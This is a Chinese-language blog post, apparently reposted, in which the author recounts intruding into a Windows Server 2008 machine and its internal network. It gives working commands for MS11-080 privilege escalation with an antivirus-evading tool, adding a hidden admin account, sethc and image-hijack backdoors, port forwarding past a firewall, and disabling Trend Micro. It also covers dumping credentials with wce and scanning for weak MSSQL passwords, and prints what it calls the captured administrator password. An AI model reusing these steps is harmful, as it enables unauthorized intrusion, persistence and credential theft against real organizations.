本人通过注入拿到了一个shell,拿shell的过程就不讲了,很简单。下面分享一下提权的过程吧。没有技术含量,大牛勿喷。
一、提权
执行systeminfo看了一下竟然是2008的服务器。
看了一下补丁情况,KB2592799没有打,可以使用ms11080来进行提权。但是在上传法克工具包里的ms11080.exe时被杀,看来装了杀毒软件,用tasklist /svc命令看了一下,原来装了趋势科技的杀毒软件。
看看能不能直接结束掉进程
结果结束不掉进程,看来只能上个免杀的ms11080了。最终找到个用python写的ms1080提权工具(http://www.007hack.com/?p=667),传上去了,这次没被杀掉。
既然没有1108.exe被杀掉,试试可以执行成功不。
看来可以成功利用,那么执行命令net user admin$ admin /add & net localgroup administrators admin$ /add来添加用户了:
可以看到成功添加了用户,用taklist /svc和netstat -ano确定了远程连接端口3389已经开启,本想直接连就搞定了,结果连接时连接不上,看了一下是内网,那就上lcx进行端口转发吧。
不成功,可能是被防火墙给阻止了,来关闭防护墙试试
关闭结果还是失败,估计是被杀软或硬件防火墙给阻止了。看来只能用reduh或tunnel了。
上传tunnel,成功连接。
二、关闭杀毒软件
ok,现在成功进入了,开始看看能不能获取内网中的信息。
结果上传了几个工具都被杀了,才想起来上面有趋势科技的杀毒软件,看来还得想办法将杀毒软件的进程给结束掉。
看看以管理员权限能不能结束掉该进程
结果以管理员权限的cmd都没有结束掉。
看到上面管理员权限的cmd都没有结束掉,觉得可能权限还不够大。突然想到,在sethc劫持时弹出的cmd是systen权限的,可能比这里的cmd权限要大。所以现在要进行sethc劫持或映像劫持。
(1)sethc劫持
sethc劫持时的命令是:copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
结果被拒绝访问,看来没权限将cmd替换成sethc。那就试一试映像劫持吧。
(2)映像劫持
映像劫持的方法是在注册表HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\下建setch.exe,相应的注册表项设置为 debugger reg_sz c:\windows\system32\cmd.exe
这样修改注册表后,按5下shift键出来的就是cmd.exe,而不是sethc.exe。现在,退回到登陆界面,按5下shift键出来的就是管理员权限的cmd了。
结果还是结束不掉,就在无计可施时,突然想到服务,看看能不能通过关闭相应服务来达到结束进程的目的。
关闭相应服务后,就可以成功结束该进程了
成功关闭,哎饶了好多弯路。
三、内网简单渗透
(1)先用wce获取管理员口令
成功获取管理员的口令:Administrator jsdm*210029
(2)用Hscan扫描弱口令
找到多台主机的mssql主句的sa弱口令。连接上添加户即可。
看了一下内网还有域,不过与域有关的渗透还没学会,先研究研究,以后再分享吧。基本的内网渗透就到此结束了。
转载请注明:jinglingshu的博客 » 一次简单的渗透提权过程